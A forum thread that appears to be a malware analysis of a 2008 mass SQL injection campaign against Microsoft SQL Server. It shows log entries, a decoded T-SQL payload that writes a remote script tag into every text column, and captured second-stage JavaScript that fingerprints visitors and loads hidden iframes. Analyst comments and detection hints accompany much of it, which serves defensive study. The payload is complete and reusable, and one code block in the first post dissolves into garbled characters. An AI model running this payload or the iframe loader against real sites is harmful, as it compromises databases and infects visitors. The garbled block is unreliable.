Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment.

August 21, 2008, 11:11:43 am
Reply #103

Orac

New SQL injection; we've seen 418 separate injection attempts involving the script within the last 24 hours.



Sample Log entry, IP obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [20/Aug/2008:20:17:01 +0000] "GET /forums/index.php?showtopic=1440';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.59 http://bsalsa.com/ EmbeddedWB- 14.59  from: http://bsalsa.com/ )" (malwarebytes.org) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"!
></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

We've also seen a second version of this script; the differences are as follows:
Code: [Select]
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!
0272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like2!
rrR#懵鱂桭芐闱67&B7&3&嘒GⅡ鱳ws"柶26怫77'72鱮妲2#懵67&C懵乙rrr攄UD4銾匓e$粢F&芔7W'6"斿DB2T銪4孽4RF&芔7W'6"DT哪4DRF&芔7W'62




Code: [Select]
--11:38:09--  http://www2.1000ylc.cn/csrss/w.js
           => `w.js'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// Captured sample of w.js from www2.1000ylc.cn. Unlike the earlier variants there is no
// window.onerror suppression at the top, and both second-stage iframes are 0x0.
// js1eus is a run-once flag: the SQL payload appends the tag to every text column, so it can be included several times per page.
if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
// Visitor fingerprint as a query string: referrer, URL, colour depth, screen size,
// returning-visit count (cc_k, defined below), system language and user agent.
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
// 0x0 hidden iframe that reports the fingerprint to the count41.51yes.com counter (id 419214144).
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

// Second stage by browser UI language: EN-US gets csrss/new.htm, everything else csrss/notnew.htm,
// both from www2.1000ylc.cn in a hidden 0x0 iframe.
var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/notnew.htm></iframe>");

}

}

// Returns the slice of document.cookie starting at index iz and ending at the next ';'
// (or at the end of the cookie string when there is no further ';').
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
// Cookie lookup: scans document.cookie for "name=" at the start of each space-separated token
// and returns its value via y_gVal; returns null when the cookie is not present.
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
// Returning-visitor counter kept in two cookies, cck_lasttime and cck_count.
// First visit (no cck_lasttime): stores now in cck_lasttime, 0 in cck_count, returns 0.
// Later visits: if more than yesvisitor ms (36,000,000 ms = 10 h) have passed since cck_lasttime,
// increments cck_count and refreshes both cookies; returns the count either way.
// Cookies expire y_t ms (93,312,000 ms, about 25.9 h) after the call. y_c3 is assigned without var (implicit global).
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}



Code: [Select]
--11:39:44--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 500



Code: [Select]
--11:40:21--  http://www2.1000ylc.cn/csrss/new.htm
           => `new.htm'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<script language="JavaScript">
<!--
// NOTE(review): the Sym* wrappers look like the pop-up-blocker shim that Symantec/Norton client
// software inserts into pages passing through it, not part of the served page — confirm before
// treating them as an indicator of the malware itself.

// Swallows every script error on the page.
function SymError()
{
  return true;
}

window.onerror = SymError;

// Keeps the real window.open so SymOnLoad (later in this page) can restore it.
var SymRealWinOpen = window.open;

// Replacement window.open that opens nothing and returns an empty object.
function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<!-- Body of www2.1000ylc.cn/csrss/new.htm: a cnzz.com stats script (id 1019605), five 100x10 iframes
     resolved relative to this page (flash.htm, 06014.html, yahoo.htm, office.htm, ksx.htm)
     and a 51.la counter script (id 2087353). -->
<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
// Second half of the Sym* shim (see the first script block): chains the page's own
// onload/onunload handlers around the window.open swap.
var SymRealOnLoad;
var SymRealOnUnload;

// On unload: re-install the no-op window.open, then run the page's original onunload if any.
function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

// On load: run the page's original onload, restore the real window.open,
// and hook the page's onunload behind SymOnUnload.
function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>




Code: [Select]
--11:41:56--  http://www2.1000ylc.cn/csrss/notnew.htm
           => `notnew.htm'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--
// NOTE(review): the Sym* wrappers look like the pop-up-blocker shim that Symantec/Norton client
// software inserts into pages passing through it, not part of the served page — confirm before
// treating them as an indicator of the malware itself.

// Swallows every script error on the page.
function SymError()
{
  return true;
}

window.onerror = SymError;

// Keeps the real window.open so SymOnLoad (later in this page) can restore it.
var SymRealWinOpen = window.open;

// Replacement window.open that opens nothing and returns an empty object.
function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2087412.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>





Code: [Select]
--11:43:17--  http://s96.cnzz.com/stat.php
           => `stat.php'
Resolving s96.cnzz.com... 219.232.243.5
Connecting to s96.cnzz.com[219.232.243.5]:80... connected
HTTP request sent, awaiting response... 200 OK

This returned a 0-byte page.


Code: [Select]
--11:44:38--  http://js.users.51.la/2087353.js
           => `2087353.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// analyst note: 2087353.js as served by js.users.51.la (202.104.236.224), the
// counter referenced from new.htm. It reads as a public hit-counter script (it
// labels itself one below); presumably the operator uses it to count visitors
// who reach new.htm rather than to deliver anything itself -- the beacon host
// web.51.la is still a useful indicator for that page having been rendered.
// analyst note: visible 51.la badge link plus an icon from icon.ajiang.net
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
// analyst note: silences script errors for the rest of the page
window.onerror=function(){return true};
// analyst note: the inline scripts written here collect the page's own, top and
// parent referrers, the parent location, colour depth, screen size and timezone;
// they keep two counters in cookies (AJSTAT_ok_pages, ~1 h expiry; AJSTAT_ok_times,
// ~365 d) and finally write a 0x0 img beacon to web.51.la/go.asp carrying all of it
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');



Code: [Select]
--11:46:04--  http://js.users.51.la/2087412.js
           => `2087412.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// analyst note: 2087412.js, the counter referenced from notnew.htm; identical in
// structure to 2087353.js above, only the counter id differs, so the operator can
// tell new.htm visitors from notnew.htm visitors on the 51.la side
// analyst note: visible 51.la badge link plus an icon from icon.ajiang.net
document.write ('<a href="http://www.51.la/?2087412" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
// analyst note: silences script errors for the rest of the page
window.onerror=function(){return true};
// analyst note: collects referrers (own/top/parent), parent location, colour
// depth, screen size and timezone, keeps AJSTAT_ok_pages (~1 h) and
// AJSTAT_ok_times (~365 d) cookies, then writes a 0x0 img beacon to web.51.la/go.asp
document.write ('<script>var a7412tf="51la";var a7412pu="";var a7412pf="51la";var a7412su=window.location;var a7412sf=document.referrer;var a7412of="";var a7412op="";var a7412ops=1;var a7412ot=1;var a7412d=new Date();var a7412color="";if (navigator.appName=="Netscape"){a7412color=screen.pixelDepth;} else {a7412color=screen.colorDepth;}<\/script><script>a7412tf=top.document.referrer;<\/script><script>a7412pu =window.parent.location;<\/script><script>a7412pf=window.parent.document.referrer;<\/script><script>a7412ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7412ops=(a7412ops==null)?1: (parseInt(unescape((a7412ops)[2]))+1);var a7412oe =new Date();a7412oe.setTime(a7412oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7412ops+ ";path=/;expires="+a7412oe.toGMTString();a7412ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7412ot==null){a7412ot=1;}else{a7412ot=parseInt(unescape((a7412ot)[2])); a7412ot=(a7412ops==1)?(a7412ot+1):(a7412ot);}a7412oe.setTime(a7412oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7412ot+";path=/;expires="+a7412oe.toGMTString();<\/script><script>a7412of=a7412sf;if(a7412pf!=="51la"){a7412of=a7412pf;}if(a7412tf!=="51la"){a7412of=a7412tf;}a7412op=a7412pu;try{lainframe}catch(e){a7412op=a7412su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087412&tpages=\'+a7412ops+\'&ttimes=\'+a7412ot+\'&tzone=\'+(0-a7412d.getTimezoneOffset()/60)+\'&tcolor=\'+a7412color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7412of)+\'&vpage=\'+escape(a7412op)+\'" \/>\');<\/script>');

Malware analysed using Clarified Analyzer to record and document how the malware behaves in a networked environment.

August 22, 2008, 11:12:17 am
Reply #104

Orac

Sample log entry, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [22/Aug/2008:03:08:47 +0000] "GET /forums/index.php?showtopic=3063';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; .NET CLR 1.1.4322; InfoPath.1)" (malwarebytes.org) "-"

Decoded
Code: [Select]
-- analyst note: decoded from the 0x... hex string in the request above. This is
-- T-SQL (sysobjects/syscolumns, @@FETCH_STATUS, dynamic exec), so the target is
-- Microsoft SQL Server behind a page that concatenates a query-string value into SQL.
-- It opens a cursor over every user table (sysobjects.xtype='u') and every column
-- whose type id is 99 (ntext), 35 (text), 231 (nvarchar) or 167 (varchar), and for
-- each table/column pair runs a dynamic UPDATE that prepends
--   "></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--
-- to the column's current value: the leading "></title> breaks out of an attribute
-- or <title> context and the trailing <!-- comments out whatever follows, so the
-- tag is rendered wherever the column is later echoed into a page.
-- No knowledge of the schema is needed; what it does rely on is the injected
-- statement running as a login with UPDATE on every user table, which is why a
-- least-privilege application account bounds the damage even when the injection
-- itself is not caught.
-- The WHERE guard's LIKE pattern has only a leading %, i.e. it tests for the tag as
-- a suffix while this variant prepends it, so a repeat run can stack copies.
-- Detection: the request carries ';DECLARE @S CHAR(4000);SET @S=CAST(0x' in the
-- query string (URL-encoded as %20 in the log above); on the database side,
-- searching the same four column types for the literal '<script src=' locates the
-- affected rows.
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


Code: [Select]
--11:43:29--  http://www0.douhunqn.cn/csrss/w.js
           => `w.js'
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// analyst note: w.js, the script whose tag the SQL payload above writes into every
// text column. The js1eus guard makes it run once per page even when the tag was
// injected into several columns that the page echoes.
if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
// analyst note: visitor fingerprint -- referrer, location, colour depth,
// resolution, a repeat-visit counter from cc_k() (defined below; function
// declarations are hoisted), IE's navigator.systemLanguage and the user agent
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
// analyst note: 0x0 hidden iframe beacon to a 51yes.com hit counter (id=419214144);
// this is the first outbound request a victim browser makes (it answered 500 in
// the capture below), so count41.51yes.com is the indicator to watch for
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

// analyst note: navigator.userLanguage exists in Internet Explorer only; elsewhere
// .toUpperCase() on undefined throws and, unless the host page installed an
// onerror handler, stops this script here. The second stage is therefore
// effectively delivered only to IE with an en-US locale.
var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
// analyst note: second-stage hidden iframe -> /csrss/new.htm (captured below)
document.write("<iframe  width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}else{
// analyst note: visitors with any other locale receive nothing further

}

}

// analyst note: returns the cookie text from offset iz up to the next ';' (or the
// end of document.cookie); helper for y_g()
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
// analyst note: looks up cookie `name` by scanning document.cookie for "name=" at
// the start or after a space separator; returns its value or null when absent
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
// analyst note: repeat-visit counter used for the '&returning=' field above. First
// visit: sets cck_lasttime (now, ms) and cck_count=0, expiring now+93312000 ms
// (about 26 h), and returns 0. Later visits: if more than yesvisitor (36,000,000 ms,
// 10 h) has passed since cck_lasttime, increments cck_count and refreshes both
// cookies; returns the count. y_c3 is assigned without var, i.e. as a global.
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Code: [Select]
--11:45:34--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 500

Code: [Select]
<!-- analyst note: response body for the 500 from count41.51yes.com/sa.aspx. This is
     the stock ASP.NET "Runtime Error" page in its Chinese localisation: the text
     says customErrors is hiding the details from remote callers and shows the
     web.config snippets that would change that. It carries no operator content --
     the counter endpoint simply failed for this request, as it did for the earlier
     fetch at 11:39:44. -->
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>


Code: [Select]
--11:48:08--  http://www0.douhunqn.cn/csrss/new.htm
           => `new.htm'
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<!-- analyst note: /csrss/new.htm as served by www0.douhunqn.cn. The markup is the
     same as the new.htm captured earlier from www2.1000ylc.cn, down to the counter
     ids (cnzz 1019605, 51.la 2087353), and both hostnames resolved to 121.11.76.85
     in this thread -- the two domains are the same infrastructure, so the IP is a
     better indicator than either name. The Sym* blocks are presumably analysis-side
     injection (TODO confirm), not operator content. -->
<script language="JavaScript">
<!--

// analyst note: swallows every script error raised on the page
function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

// analyst note: replaces window.open with a stub that returns an empty object
function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<!-- analyst note: counter loaders (cnzz.com id 1019605, 51.la id 2087353); both
     scripts are captured below -->
<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<!-- analyst note: five 100x10 iframes with relative src from the same /csrss/
     directory; not fetched in this capture, so their contents are not known here -->
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

// analyst note: on unload re-installs the window.open stub, then chains the
// original onunload handler if one existed
function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

// analyst note: on load chains the original onload handler, restores the real
// window.open and hooks onunload
function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


Code: [Select]
--11:51:03--  http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605
           => `stat.php?id=1019605&web_id=1019605'
Resolving s96.cnzz.com... 219.232.241.133
Connecting to s96.cnzz.com[219.232.241.133]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// analyst note: returns the URL-decoded cookie text from offset `of` up to the
// next ';' (or the end of document.cookie); helper for gc_cnzz()
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
// analyst note: looks up cookie `n` by scanning document.cookie for "n=" at the
// start or after a space separator; returns its decoded value, or -1 when absent
// (callers below test for -1, so a cookie literally set to "-1" reads as missing)
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
// analyst note: stat.php for cnzz site id 1019605, loaded from new.htm. Plain
// visitor-counting logic; its value for the defender is the beacon destination
// (222.77.187.203, a bare IP) and the cookie names it leaves behind.
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
// analyst note: user agent, referrer, appName, IE systemLanguage, platform and
// appVersion; the fixed ntime value looks like a server-side microtime() stamp
// baked into the script when it was served (the integer part is an epoch on the
// capture date) -- TODO confirm against a second fetch
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.17388800 1219402362';
// analyst note: per-site page-view counter for the current day
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
// analyst note: rtime = return-visit count, ltime = last-visit time (ms),
// cnzz_eid = visitor id built from a random number plus the first referrer
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
// analyst note: now and lt are milliseconds, so 500*86400 is 43,200,000 ms = 12 h
// between visits before the return counter is bumped
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
// analyst note: visible "site statistics" link to cnzz.com (null-routed to
// 127.0.0.1 on the analysis host, see below)
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="站长统计">站长统计</a>');
